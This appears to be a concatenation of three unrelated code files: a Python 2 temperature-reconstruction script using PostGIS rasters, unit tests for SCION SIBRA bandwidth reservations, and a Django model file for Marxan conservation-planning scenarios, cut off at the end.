cruMapStd = getPgRast(conn, query)
# calculate the overall std map size, because all raster data are trimmed and have to be set to the same extent for the calculation
bboxExtent = cruMapStd.shape
# get region_rep => max raster of all corresponding correlation rasters
# change to event id in for visible index points
query = """SELECT ST_DUMPVALUES(ST_Union(f.rast, 'MAX'))
FROM (SELECT ST_UNION(rast,'MAX') as rast
FROM temperature_monthly_regio_weight
WHERE event_id IN(""" + evIdsStr + """)
UNION ALL
SELECT ST_MAKEEMPTYRASTER(rast) as rast
FROM temperature_cru_mean
WHERE month=1) As f"""
regionRepr = getPgRast(conn, query)
#query = "Select (ST_METADATA(ST_UNION(rast,'MAX'))).*, ST_DUMPVALUES(ST_UNION(rast,'MAX')) From temperature_monthly_regio_weight WHERE event_id IN(" + evIdsStr + ");"
#metadata = getPgRast(conn, query, True, bboxExtent)
# get indices_recon
query = """SELECT ST_DUMPVALUES(ST_Union(f.rast, 'MAX'))
FROM (SELECT ST_UNION(rast,'MEAN') as rast
FROM temperature_monthly_regio_idxrec
WHERE event_id IN(""" + evIdsStr + """)
UNION ALL
SELECT ST_MAKEEMPTYRASTER(rast) as rast
FROM temperature_cru_mean
WHERE month=1) As f"""
#query = "Select (ST_METADATA(ST_UNION(rast,'MEAN'))).*, ST_DUMPVALUES(ST_UNION(rast,'MEAN')) From temperature_monthly_regio_idxrec WHERE event_id IN(" + evIdsStr + ");"
#indicesRecon = getPgRast(conn, query, True, bboxExtent)
indicesRecon = getPgRast(conn, query)
# get weighting
query = """SELECT ST_DUMPVALUES(ST_Union(f.rast, 'MAX'))
FROM (SELECT ST_UNION(rast,'MEAN') as rast
FROM temperature_monthly_regio_weight
WHERE event_id IN(""" + evIdsStr + """)
UNION ALL
SELECT ST_MAKEEMPTYRASTER(rast) as rast
FROM temperature_cru_mean
WHERE month=1) As f"""
#query = "Select (ST_METADATA(ST_UNION(rast,'MEAN'))).*, ST_DUMPVALUES(ST_UNION(rast,'MEAN')) From temperature_monthly_regio_weight WHERE event_id IN(" + evIdsStr + ");"
#weighting = getPgRast(conn, query, True, bboxExtent)
weighting = getPgRast(conn, query)
# get cru maps in columns for month
# get absolute file path
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
# set path
hdf5 = __location__ + hdf5PATH + str(month) + ".hdf5"
# read file
file = h5py.File(hdf5, 'r')
# select dataset
dataset = file['cru_data']
mSelCol = dataset[()]
file.close()
# transform region_repr map to column vector
regionReprInCol = regionRepr.reshape(regionRepr.shape[0]*regionRepr.shape[1],1)
# Test
# print np.where(~np.isnan(regionReprInCol))
# get scoredata
mask = ~np.isnan(regionReprInCol)[:,0]
scoredata = mSelCol[:,mask].T
# scale and center data (mean differs from R/Matlab only by floating-point noise, ~1e-17)
zscore = scale(scoredata, axis= 0, with_mean=True, with_std=True, copy=False).T
# get indices
# query = "Select ST_DUMPVALUES(ST_UNION(rast,'MEAN')) From temperature_recon_idx_4_pca WHERE year = " + str(year) + " and month = " + str(month) + " and event_id IN(" + evIdsStr + ");"
# indicesRecon = getPgRast(conn, query)
indicesRecon = indicesRecon/weighting
# reconstruct temperature field
reconstructed = reconstruct(zscore, regionReprInCol, indicesRecon, mSelCol, cruMapStd)
# trim array to the data extent only
#reconstructed[0][0]=15
ymin = min(np.where(~np.isnan(reconstructed))[0])-1
ymax = max(np.where(~np.isnan(reconstructed))[0])+2
xmin = min(np.where(~np.isnan(reconstructed))[1])-1
xmax = max(np.where(~np.isnan(reconstructed))[1])+2
padding = 2
print 'pad'
print reconstructed[0][0]
#print np.where(~np.isnan(reconstructed))[1]
print xmin, xmax, ymin, ymax
# prepare global data array
a = np.empty(((ymax-ymin)+padding,(xmax-xmin)+padding,))
a[:] = np.nan
print reconstructed.shape
print reconstructed[ymin:ymax,xmin:xmax].shape
#a[padding/2:(ymax-ymin)+padding/2,padding/2:(xmax-xmin)+padding/2]=reconstructed[ymin:ymax,xmin:xmax]
a=reconstructed[ymin:ymax,xmin:xmax]
#print ymin, ymax,xmin,xmax
yscale = 0.493827160493827
xscale = 0.496894409937888
yscale = 0.493827160493827
xscale = 0.496894409937888
print 'scale'
print yscale, xscale
Yminb = ((yscale*(ymin-padding/2))+30)
Ymaxb = ((yscale*(ymax+padding/2))+30)
Xminb = ((xscale*(xmin-padding/2))-30)
Xmaxb = ((xscale*(xmax+padding/2))-30)
Yminb = ((yscale*(ymin))+30)
Ymaxb = ((yscale*(ymax))+30)
Xminb = ((xscale*(xmin))-30)
Xmaxb = ((xscale*(xmax))-30)
# image min/max lat and lon
lat = np.array(( Yminb, Ymaxb )) #y
lon = np.array(( Xminb, Xmaxb )) #x
#print lat
#print lon
a[np.isnan(a)] = 9999
# set no data value
reconstructed[np.isnan(reconstructed)] = 9999
a=reconstructed
#print reconstructed.shape
import sys
#sys.exit("Error message")
#lat = np.array(( 30, 70 ))
#lon = np.array(( -30.0, 50.0 ))
# create geotiff
#numpy2geotiff(reconstructed, lat, lon)
numpy2geotiff(a, lat, lon)
# write geotiff to postgres and return event hash for php postgres query
geotiff2psql(conn, year, month, evIdsStr)
# close db connection
conn.close()
# return the event hash for the PHP postgres query at [4], because PHP can only fetch printed output
# and GDAL also prints success messages to stdout on file creation and upload
#print evHash
|
|
# Copyright 2016 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`reservation_test` --- lib.sibra.state.reservation unit tests
==================================================================
"""
# Stdlib
from unittest.mock import patch
# External packages
import nose
import nose.tools as ntools
# SCION
from lib.sibra.state.reservation import ReservationBase, SteadyReservation
from lib.sibra.util import BWSnapshot
from test.testcommon import create_mock
class ReservationBaseTesting(ReservationBase):
MAX_TICKS = 4
RESV_TYPE = "resv type"
class TestReservationBaseAdd(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase.add
"""
@patch("lib.sibra.state.reservation.BWSnapshot", autospec=True)
@patch("lib.sibra.state.reservation.logging", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test_in_use(self, super_init, logging, bwsnap):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.idxes = [0, 2, 7]
# Call
ntools.eq_(inst.add(2, "bwsnap", 43, 42), bwsnap.return_value)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test_too_large(self, super_init):
inst = ReservationBaseTesting("path id", "owner", "parent")
bw_avail = create_mock(["__add__", "min"])
bw_avail.__add__.return_value = bw_avail
inst.parent = create_mock(["bw_avail"])
inst.parent.bw_avail.return_value = bw_avail
inst.resvs = [8]
bwsnap = create_mock(["slte"])
bwsnap.slte.return_value = False
# Call
ntools.eq_(inst.add(2, bwsnap, 43, 42), bw_avail.min.return_value)
# Tests
bw_avail.__add__.assert_called_once_with(8)
bwsnap.slte.assert_called_once_with(bw_avail)
bw_avail.min.assert_called_once_with(bwsnap)
@patch("lib.sibra.state.reservation.ReservationIndex", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test_success(self, super_init, resv_idx):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.parent = create_mock(["bw_avail"])
inst.parent.bw_avail.return_value = 8
inst.resvs = [8]
inst._update = create_mock()
bwsnap = create_mock(["slte"])
# Call
ntools.eq_(inst.add(2, bwsnap, 43, 42), bwsnap)
# Tests
resv_idx.assert_called_once_with(2, bwsnap, 43)
ntools.eq_(inst.idxes, {2: resv_idx.return_value})
ntools.eq_(inst.order, [2])
inst._update.assert_called_once_with(42)
class TestReservationBaseUpdate(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase._update
Note: these tests do not mock out BWSnapshot, as it would make testing too
complex to be useful.
"""
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def _check(self, old_resvs, resvs, updates, super_init):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.parent = create_mock(["update"])
inst.resvs = []
for bw in old_resvs:
inst.resvs.append(BWSnapshot(bw * 1024, bw * 1024))
for idx, exp_tick, bw in resvs:
inst.order.append(idx)
resv = create_mock(["bwsnap", "exp_tick"])
resv.bwsnap = BWSnapshot(bw * 1024, bw * 1024)
resv.exp_tick = exp_tick
inst.idxes[idx] = resv
# Call
inst._update(0)
# Tests
if not updates:
ntools.eq_(inst.parent.update.called, False)
return
parent_updates = []
for idx, bw in updates:
parent_updates.append((idx, BWSnapshot(bw * 1024, bw * 1024)))
inst.parent.update.assert_called_once_with(parent_updates)
def test_no_change(self):
# 0: 40, 40, 40, 0...
# 7: 20, 20, 20, 20, 0...
# 4: 50, 50, 0...
resvs = [(0, 2, 40), (7, 3, 20), (4, 1, 50)]
old_resvs = [50, 0, -10, -20, -20]
self._check(old_resvs, resvs, [])
def test_update(self):
# 0: 30, 30, 30, 0...
# 7: 10, 10, 10, 10, 10, 10, 0...
# 4: 40, 0...
resvs = [(0, 2, 30), (7, 5, 10), (4, 0, 40)]
old_resvs = [50, 0, -10, -20, 0, 0, -20]
update = [(0, -10), (1, -10), (2, +10), (6, 10)]
self._check(old_resvs, resvs, update)
class TestReservationBaseNext(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase.next
"""
@patch("lib.sibra.state.reservation.BWSnapshot", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.next", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test(self, super_init, super_next, bwsnap):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst._rollover = create_mock()
inst._expire = create_mock()
inst.resvs = ["new max bw"]
for i in range(3):
resv = create_mock(["exp_tick"])
resv.exp_tick = 9 + i
inst.idxes[i] = resv
# Call
inst.next(10)
# Tests
super_next.assert_called_once_with(inst)
inst._rollover.assert_called_once_with(inst.child_resvs)
ntools.eq_(inst.max_bw, "new max bw")
ntools.eq_(inst.child_used, bwsnap.return_value)
inst._expire.assert_called_once_with([0], 10)
class TestReservationBaseUse(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase.use
"""
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test(self, super_init):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.curr_used = 0
inst._expire = create_mock()
inst.order = [6, 7, 9, 0, 2, 4]
# Call
ntools.ok_(inst.use(0, 42, 11))
# Tests
ntools.eq_(inst.curr_used, 42)
inst._expire.assert_called_once_with([6, 7, 9], 11)
class TestSteadyReservationUpdate(object):
"""
Unit tests for lib.sibra.state.reservation.SteadyReservation.update
Note: these tests do not mock out BWSnapshot, as it would make testing too
complex to be useful.
"""
def test(self):
inst = SteadyReservation("owner", BWSnapshot(100, 100), "parent")
inst.max_bw = BWSnapshot(100, 100)
for i, bw in enumerate([50, 0, -10, -20, 0, 0, -20]):
inst.child_resvs[i] = BWSnapshot(bw, bw)
updates = []
for idx, bw in [(0, -10), (1, -10), (2, +10), (6, 10)]:
updates.append((idx, BWSnapshot(bw, bw)))
# Call
inst.update(updates)
# Tests
for i, bw in enumerate([40, -10, 0, -20, 0, 0, -10]):
tick = BWSnapshot(bw, bw)
ntools.eq_(inst.child_resvs[i], tick)
if __name__ == "__main__":
nose.run(defaultTest=__name__)
|
|
import os
import glob
import shutil
from django.conf import settings
from django.contrib.gis.db import models
from django.core.cache import cache
from django.template.defaultfilters import slugify
from django.utils.html import escape
from django.db.models.signals import post_delete
from django.dispatch.dispatcher import receiver
from madrona.features import register, alternate
from madrona.features.models import FeatureCollection
from madrona.unit_converter.models import area_in_display_units
from madrona.analysistools.models import Analysis
from madrona.common.utils import asKml
from madrona.async.ProcessHandler import process_is_running, process_is_complete, \
    process_is_pending, get_process_result, check_status_or_begin
from madrona.common.utils import get_logger
from seak.tasks import marxan_start
from django.core.serializers.json import DjangoJSONEncoder
from django.utils import simplejson as json
from madrona.common.models import KmlCache
from seak.jenks import get_jenks_breaks
logger = get_logger()
def cachemethod(cache_key, timeout=3600):
'''
http://djangosnippets.org/snippets/1130/
Cacheable class method decorator
from madrona.common.utils import cachemethod
@property
@cachemethod("SomeClass_get_some_result_%(id)s")
'''
def paramed_decorator(func):
def decorated(self):
if not settings.USE_CACHE:
res = func(self)
return res
key = cache_key % self.__dict__
#logger.debug("\nCACHING %s" % key)
res = cache.get(key)
if res == None:
#logger.debug(" Cache MISS")
res = func(self)
cache.set(key, res, timeout)
#logger.debug(" Cache SET")
if cache.get(key) != res:
logger.error("*** Cache GET was NOT successful, %s" % key)
return res
return decorated
return paramed_decorator
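# Illustrative sketch (assumed usage, mirroring the docstring above): the cache
# key pattern is interpolated against the instance's __dict__, so for id=42 the
# value below is cached under "Widget_42_label".
#
#   class Widget(object):
#       def __init__(self, id):
#           self.id = id
#
#       @property
#       @cachemethod("Widget_%(id)s_label", timeout=60)
#       def label(self):
#           return "widget-%s" % self.id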
class JSONField(models.TextField):
"""JSONField is a generic textfield that neatly serializes/unserializes
JSON objects seamlessly"""
# Used so to_python() is called
__metaclass__ = models.SubfieldBase
def to_python(self, value):
"""Convert our string value to JSON after we load it from the DB"""
if value == "":
return None
# Actually we'll just return the string
# need to explicitly call json.loads(X) in your code
# reason: converting to dict then repr that dict in a form is invalid json
# i.e. {"test": 0.5} becomes {u'test': 0.5} (not unicode and single quotes)
return value
def get_db_prep_save(self, value, *args, **kwargs):
"""Convert our JSON object to a string before we save"""
if value == "":
return None
if isinstance(value, dict):
value = json.dumps(value, cls=DjangoJSONEncoder)
return super(JSONField, self).get_db_prep_save(value, *args, **kwargs)
# http://south.readthedocs.org/en/latest/customfields.html#extending-introspection
from south.modelsinspector import add_introspection_rules
add_introspection_rules([], ["^seak\.models\.JSONField"])
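# Illustrative usage (assumed instance): a JSONField stores a JSON string and,
# per to_python() above, hands the raw string back, so callers json.loads() it
# explicitly.
#
#   scenario.input_targets = json.dumps({'widespread---trout': 0.5})
#   targets = json.loads(scenario.input_targets)   # -> {'widespread---trout': 0.5}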
class ConservationFeature(models.Model):
'''
Django model representing Conservation Features (typically species)
'''
name = models.CharField(max_length=99)
level1 = models.CharField(max_length=99)
level2 = models.CharField(max_length=99, null=True, blank=True)
level3 = models.CharField(max_length=99, null=True, blank=True)
level4 = models.CharField(max_length=99, null=True, blank=True)
level5 = models.CharField(max_length=99, null=True, blank=True)
dbf_fieldname = models.CharField(max_length=15, null=True, blank=True)
units = models.CharField(max_length=90, null=True, blank=True)
uid = models.IntegerField(primary_key=True)
@property
def level_string(self):
""" All levels concatenated with --- delim """
levels = [self.level1, self.level2, self.level3, self.level4, self.level5]
return '---'.join([slugify(x.lower()) for x in levels])
@property
def id_string(self):
""" Relevant levels concatenated with --- delim """
levels = [self.level1, self.level2, self.level3, self.level4, self.level5]
return '---'.join([slugify(x.lower()) for x in levels if x not in ['', None]])
def __unicode__(self):
return u'%s' % self.name
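# Illustrative example (assumed data): a ConservationFeature with
# level1="Widespread", level2="Trout" and the remaining levels left blank gives
#   level_string -> "widespread---trout---------"   (all five levels, slugified)
#   id_string    -> "widespread---trout"            (blank levels dropped)
# These are the strings Scenario.process_dict() matches user input against.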
class Cost(models.Model):
'''
Django model representing Costs (typically planning unit metrics which are considered
"costly")
'''
name = models.CharField(max_length=99)
uid = models.IntegerField(primary_key=True)
dbf_fieldname = models.CharField(max_length=15, null=True, blank=True)
units = models.CharField(max_length=16, null=True, blank=True)
desc = models.TextField()
@property
def slug(self):
return slugify(self.name.lower())
def __unicode__(self):
return u'%s' % self.name
class PlanningUnit(models.Model):
'''
Django model representing polygon planning units
'''
fid = models.IntegerField(primary_key=True)
name = models.CharField(max_length=99)
geometry = models.MultiPolygonField(srid=settings.GEOMETRY_DB_SRID,
null=True, blank=True, verbose_name="Planning Unit Geometry")
objects = models.GeoManager()
date_modified = models.DateTimeField(auto_now=True)
@property
@cachemethod("PlanningUnit_%(fid)s_area")
def area(self):
# TODO don't assume storing meters and returning km^2
area = self.geometry.area / float(1000*1000)
return area
@property
@cachemethod("PlanningUnit_%(fid)s_centroid")
def centroid(self):
centroid = self.geometry.point_on_surface.coords
return centroid
def __unicode__(self):
return u'%s' % self.name
@property
@cachemethod("PlanningUnit_%(fid)s_cffields")
def conservation_feature_fields(self):
cfs = PuVsCf.objects.filter(pu=self, amount__isnull=False).select_related()
return [x.cf.dbf_fieldname for x in cfs]
@property
@cachemethod("PlanningUnit_%(fid)s_costfields")
def cost_fields(self):
cfs = PuVsCost.objects.filter(pu=self, amount__isnull=False).select_related()
return [x.cost.dbf_fieldname for x in cfs]
class DefinedGeography(models.Model):
'''
A subset of planning units that can be referred to by name
'''
name = models.CharField(max_length=99)
planning_units = models.ManyToManyField(PlanningUnit)
@property
def planning_unit_fids(self):
return json.dumps([x.fid for x in self.planning_units.all()])
@property
def slug(self):
return slugify(self.name)
def __unicode__(self):
return self.name
class PuVsCf(models.Model):
'''
The conservation feature value per planning unit
'''
pu = models.ForeignKey(PlanningUnit)
cf = models.ForeignKey(ConservationFeature)
amount = models.FloatField(null=True, blank=True)
class Meta:
unique_together = ("pu", "cf")
class PuVsCost(models.Model):
'''
The cost feature value per planning unit
'''
pu = models.ForeignKey(PlanningUnit)
cost = models.ForeignKey(Cost)
amount = models.FloatField(null=True, blank=True)
class Meta:
unique_together = ("pu", "cost")
def scale_list(vals, floor=None):
"""
If floor is None, Scales a list of floats linearly between 100*min/max and 100
Otherwise, scales a list of floats linearly between floor and 100
"""
if len(vals) < 1:
return []
nonull_vals = []
for v in vals:
if v:
nonull_vals.append(v)
else:
logger.error("WARNING: null value enountered in a scaled list: assuming zero!")
nonull_vals.append(0)
minval = min(nonull_vals)
maxval = max(nonull_vals)
high = 100.0
if floor is None:
try:
low = 100.0 * float(minval)/maxval
except ZeroDivisionError:
low = 0
else:
low = floor
if maxval == minval:
return [0] * len(vals)
scaled = [high - (z / float(maxval - minval)) for z in
[(high - low) * y for y in
[maxval - x for x in nonull_vals]]]
return scaled
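# Worked example (illustrative):
#   scale_list([10, 20, 30])           -> [33.33..., 66.66..., 100.0]   (low = 100*min/max)
#   scale_list([10, 20, 30], floor=0)  -> [0.0, 50.0, 100.0]
# A list where max == min collapses to all zeros, and None values are treated as
# zero (with a logged warning).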
@register
class Scenario(Analysis):
'''
Madrona feature for prioritization scenario
'''
input_targets = JSONField(verbose_name='Target Percentage of Habitat')
input_penalties = JSONField(verbose_name='Penalties for Missing Targets')
input_relativecosts = JSONField(verbose_name='Relative Costs')
input_geography = JSONField(verbose_name='Input Geography fids')
input_scalefactor = models.FloatField(default=0.0)
description = models.TextField(default="", null=True, blank=True, verbose_name="Description/Notes")
# All output fields should be allowed to be Null/Blank
output_best = JSONField(null=True, blank=True, verbose_name="Watersheds in Optimal Reserve")
output_pu_count = JSONField(null=True, blank=True)
@property
def outdir(self):
return os.path.realpath(os.path.join(settings.MARXAN_OUTDIR, "%s_" % (self.uid,) ))
# This is not async-safe! A new modification will clobber the old.
# If new and old runs overlap, there is a small chance of a corrupted mix of output files.
@property
def expired(self):
if self.date_modified < PlanningUnit.objects.latest('date_modified').date_modified:
return True
else:
return False
def copy(self, user):
""" Override the copy method to make sure the marxan files get copied """
orig = self.outdir
copy = super(Scenario, self).copy(user)
shutil.copytree(orig, copy.outdir, symlinks=True)
copy.save(rerun=False)
return copy
def process_dict(self, d):
"""
Use the levels in the ConservationFeature table to determine the
per-species value based on the specified levels.
Input:
{
'widespread---trout': 0.5,
'widespread---lamprey': 0.4,
'widespread---salmon': 0.3,
'widespread---steelhead': 0.2,
'locally endemic': 0.1,
}
Return:
species pk is the key
{ 1: 0.5, 2: 0.5, ......}
"""
ndict = {}
for cf in ConservationFeature.objects.all():
# TODO don't assume fields are valid within the selected geography
levels = cf.level_string
val = 0
for k, v in d.items():
if levels.startswith(k.lower()):
val = v
break
ndict[cf.pk] = val
return ndict
def invalidate_cache(self):
'''
Remove any cached values associated with this scenario.
Warning: additional caches will need to be added to this method
'''
keys = ["%s_results",]
keys = [x % self.uid for x in keys]
cache.delete_many(keys)
for key in keys:
assert cache.get(key) == None
logger.debug("invalidated cache for %s" % str(keys))
return True
def run(self):
'''
Fire off the marxan analysis
'''
from seak.marxan import MarxanAnalysis
self.invalidate_cache()
# create the target and penalties
logger.debug("Create targets and penalties")
targets = self.process_dict(json.loads(self.input_targets))
penalties = self.process_dict(json.loads(self.input_penalties))
cost_weights = json.loads(self.input_relativecosts)
geography_fids = json.loads(self.input_geography)
assert len(targets.keys()) == len(penalties.keys()) #== len(ConservationFeature.objects.all())
assert max(targets.values()) <= 1.0
assert min(targets.values()) >= 0.0
nonzero_pks = [k for k, v in targets.items() if v > 0]
nonzero_targets = []
nonzero_penalties = []
for nz in nonzero_pks:
nonzero_targets.append(targets[nz])
nonzero_penalties.append(penalties[nz])
maxtarget = max(nonzero_targets)
avgtarget = float(sum(nonzero_targets))/float(len(nonzero_targets))
# ignore input, choose a scalefactor automatically based on avg and max target
self.input_scalefactor = 0.5 + (avgtarget * 2) + (maxtarget * 2)
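# e.g. (illustrative): nonzero targets of 0.2 and 0.8 give avgtarget = 0.5 and
# maxtarget = 0.8, so input_scalefactor = 0.5 + 1.0 + 1.6 = 3.1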
# Apply the target and penalties
logger.debug("Apply the targets and penalties")
cfs = []
pus = PlanningUnit.objects.filter(fid__in=geography_fids)
for cf in ConservationFeature.objects.all():
total = sum([x.amount for x in cf.puvscf_set.filter(pu__in=pus) if x.amount])
target_prop = targets[cf.pk]
# only take 99.9% at most to avoid rounding errors
# which lead Marxan to believe that the target is unreachable
if target_prop >= 0.999:
target_prop = 0.999
target = total * target_prop
penalty = penalties[cf.pk] * self.input_scalefactor
# MUST include all species even if they are zero
cfs.append((cf.pk, target, penalty, cf.name))
final_cost_weights = {}
for cost in Cost.objects.all():
costkey = cost.slug
try:
final_cost_weights[costkey] = cost_weights[costkey]
except KeyError:
final_cost_weights[costkey] = 0
raw_costs = {}
pus = []
for pu in PlanningUnit.objects.filter(fid__in=geography_fids):
puc = PuVsCost.objects.filter(pu=pu)
for c in puc:
costkey = c.cost.slug
if costkey not in raw_costs.keys():
raw_costs[costkey] = []
raw_costs[costkey].append(c.amount)
pus.append(pu.pk)
# scale, weight and combine costs
weighted_costs = {}
for costkey, costs in raw_costs.iteritems():
if None in costs:
print "Warning: skipping ", costkey, "; contains nulls in this geography"
continue
weighted_costs[costkey] = [x * final_cost_weights[costkey] for x in scale_list(costs)]
final_costs = [sum(x) for x in zip(*weighted_costs.values())]
final_costs = [1.0 if x < 1.0 else x for x in final_costs] # enforce a minimum cost of 1.0
pucosts = zip(pus, final_costs)
logger.debug("Creating the MarxanAnalysis object")
m = MarxanAnalysis(pucosts, cfs, self.outdir)
logger.debug("Firing off the process")
check_status_or_begin(marxan_start, task_args=(m,), polling_url=self.get_absolute_url())
self.process_results()
return True
@property
def numreps(self):
try:
with open(os.path.join(self.outdir,"input.dat")) as fh:
for line in fh.readlines():
if line.startswith('NUMREPS'):
return int(line.strip().replace("NUMREPS ",""))
except IOError:
# probably hasn't started processing yet
return settings.MARXAN_NUMREPS
@property
def progress(self):
path = os.path.join(self.outdir, "output", "nplcc_r*.csv")
outputs = glob.glob(path)
numreps = self.numreps
if len(outputs) == numreps:
if not self.done:
return (0, numreps)
return (len(outputs), numreps)
def geojson(self, srid):
# Note: no reprojection support here
rs = self.results
if 'units' in rs:
selected_fids = [r['fid'] for r in rs['units']]
else:
selected_fids = []
if 'bbox' in rs:
bbox = rs['bbox']
else:
bbox = None
fullname = self.user.get_full_name()
if fullname == '':
fullname = self.user.username
error = False
if self.status_code == 0:
error = True
serializable = {
"type": "Feature",
"bbox": bbox,
"geometry": None,
"properties": {
'uid': self.uid,
'bbox': bbox,
'name': self.name,
'done': self.done,
'error': error,
'sharing_groups': [x.name for x in self.sharing_groups.all()],
'expired': self.expired,
'description': self.description,
'date_modified': self.date_modified.strftime("%m/%d/%y %I:%M%P"),
'user': self.user.username,
'user_fullname': fullname,
'selected_fids': selected_fids,
'potential_fids': json.loads(self.input_geography)
}
}
return json.dumps(serializable)
@property
@cachemethod("seak_scenario_%(id)s_results")
def results(self):
targets = json.loads(self.input_targets)
penalties = json.loads(self.input_penalties)
cost_weights = json.loads(self.input_relativecosts)
geography = json.loads(self.input_geography)
targets_penalties = {}
for k, v in targets.items():
targets_penalties[k] = {'label': k.replace('---', ' > ').replace('-',' ').title(), 'target': v, 'penalty': None}
for k, v in penalties.items():
try:
targets_penalties[k]['penalty'] = v
except KeyError:
# this should never happen but just in case
targets_penalties[k] = {'label': k.replace('---', ' > ').title(), 'target': None, 'penalty': v}
species_level_targets = self.process_dict(targets)
if not self.done:
return {'targets_penalties': targets_penalties, 'costs': cost_weights}
bestjson = json.loads(self.output_best)
bestpks = [int(x) for x in bestjson['best']]
bestpus = PlanningUnit.objects.filter(pk__in=bestpks).order_by('name')
potentialpus = PlanningUnit.objects.filter(fid__in=geography)
bbox = None
if bestpus:
bbox = potentialpus.extent()
best = []
logger.debug("looping through bestpus queryset")
scaled_costs = {}
all_costs = Cost.objects.all()
scaled_breaks = {}
for costslug, weight in cost_weights.iteritems():
if weight <= 0:
continue
try:
cost = [x for x in all_costs if x.slug == costslug][0]
except IndexError:
continue
all_selected = PuVsCost.objects.filter(cost=cost, pu__in=bestpus)
all_potential = PuVsCost.objects.filter(cost=cost, pu__in=potentialpus)
vals = [x.amount for x in all_potential]
fids = [x.pu.fid for x in all_potential]
fids_selected = [x.pu.fid for x in all_selected]
scaled_values = [int(x) for x in scale_list(vals, floor=0.0)]
pucosts_potential = dict(zip(fids, scaled_values))
extract = lambda x, y: dict(zip(x, map(y.get, x)))
pucosts = extract(fids_selected, pucosts_potential)
scaled_costs[costslug] = pucosts
scaled_breaks[costslug] = get_jenks_breaks(scaled_values, 3)
logger.debug("scaled_breaks: %s" % str(scaled_breaks))
for pu in bestpus:
centroid = pu.centroid
costs = {}
costs_class = {}
for cname, pucosts in scaled_costs.iteritems():
thecost = pucosts[pu.fid]
breaks = scaled_breaks[cname]
costs[cname] = thecost
# classify the costs into categories
if thecost <= breaks[1]:
costs_class[cname] = 'low'
elif thecost > breaks[2]:
costs_class[cname] = 'high'
else:
costs_class[cname] = 'med'
logger.debug("pu=%s costs=%s costs_class=%s" % (pu, costs, costs_class))
best.append({'name': pu.name,
'fid': pu.fid,
'costs': costs,
'costs_class': costs_class,
'centroidx': centroid[0],
'centroidy': centroid[1]})
sum_area = sum([x.area for x in bestpus])
# Parse mvbest
fh = open(os.path.join(self.outdir, "output", "nplcc_mvbest.csv"), 'r')
lines = [x.strip().split(',') for x in fh.readlines()[1:]]
fh.close()
species = []
num_target_species = 0
num_met = 0
for line in lines:
sid = int(line[0])
try:
consfeat = ConservationFeature.objects.get(pk=sid)
except ConservationFeature.DoesNotExist:
logger.error("ConservationFeature %s doesn't exist; refers to an old scenario?" % sid)
continue
sname = consfeat.name
sunits = consfeat.units
slevel1 = consfeat.level1
scode = consfeat.dbf_fieldname
starget = float(line[2])
try:
starget_prop = species_level_targets[consfeat.pk]
except KeyError:
continue
sheld = float(line[3])
try:
stotal = float(starget/starget_prop)
spcttotal = sheld/stotal
except ZeroDivisionError:
stotal = 0
spcttotal = 0
smpm = float(line[9])
if starget == 0:
smpm = 0.0
smet = False
if line[8] == 'yes' or smpm > 1.0:
smet = True
num_met += 1
s = {'name': sname, 'id': sid, 'target': starget, 'units': sunits, 'code': scode,
'held': sheld, 'met': smet, 'pct_target': smpm, 'level1': slevel1,
'pcttotal': spcttotal, 'target_prop': starget_prop }
species.append(s)
if starget > 0:
num_target_species += 1
species.sort(key=lambda k:k['name'].lower())
costs = {}
for k,v in cost_weights.iteritems():
name = k.replace("-", " ").title()
costs[name] = v
res = {
'costs': costs, #cost_weights
'geography': geography,
'targets_penalties': targets_penalties,
'area': sum_area,
'num_units': len(best),
'num_met': num_met,
'num_species': num_target_species, #len(species),
'units': best,
'species': species,
'bbox': bbox,
}
return res
@property
def status_html(self):
return self.status[1]
@property
def status_code(self):
return self.status[0]
@property
def status(self):
url = self.get_absolute_url()
if process_is_running(url):
status = """Analysis for <em>%s</em> is currently running.""" % (self.name,)
code = 2
elif process_is_complete(url):
status = "%s processing is done." % self.name
code = 3
elif process_is_pending(url):
status = "%s is in the queue but not yet running." % self.name
res = get_process_result(url)
code = 1
if res is not None:
status += ".. "
status += str(res)
else:
status = "An error occured while running this analysis."
code = 0
res = get_process_result(url)
if res is not None:
status += "..<br/> "
status += str(res)
status += "<br/>Please edit the scenario and try again. If the problem persists, please contact us."
return (code, "<p>%s</p>" % status)
def process_results(self):
if process_is_complete(self.get_absolute_url()):
chosen = get_process_result(self.get_absolute_url())
wshds = PlanningUnit.objects.filter(pk__in=chosen)
self.output_best = json.dumps({'best': [str(x.pk) for x in wshds]})
ssoln = [x.strip().split(',') for x in
open(os.path.join(self.outdir,"output","nplcc_ssoln.csv"),'r').readlines()][1:]
selected = {}
for s in ssoln:
num = int(s[1])
if num > 0:
selected[int(s[0])] = num
self.output_pu_count = json.dumps(selected)
super(Analysis, self).save() # save via the base class to avoid re-triggering the analysis run
self.invalidate_cache()
@property
def done(self):
""" Boolean; is process complete? """
done = True
if self.output_best is None:
done = False
if self.output_pu_count is None:
done = False
if not done:
done = True
# only process async results if output fields are blank
# this means we have to recheck after running
self.process_results()
if self.output_best is None:
done = False
if self.output_pu_count is None:
done = False
return done
@classmethod
def mapnik_geomfield(self):
return "output_geometry"
@property
def color(self):
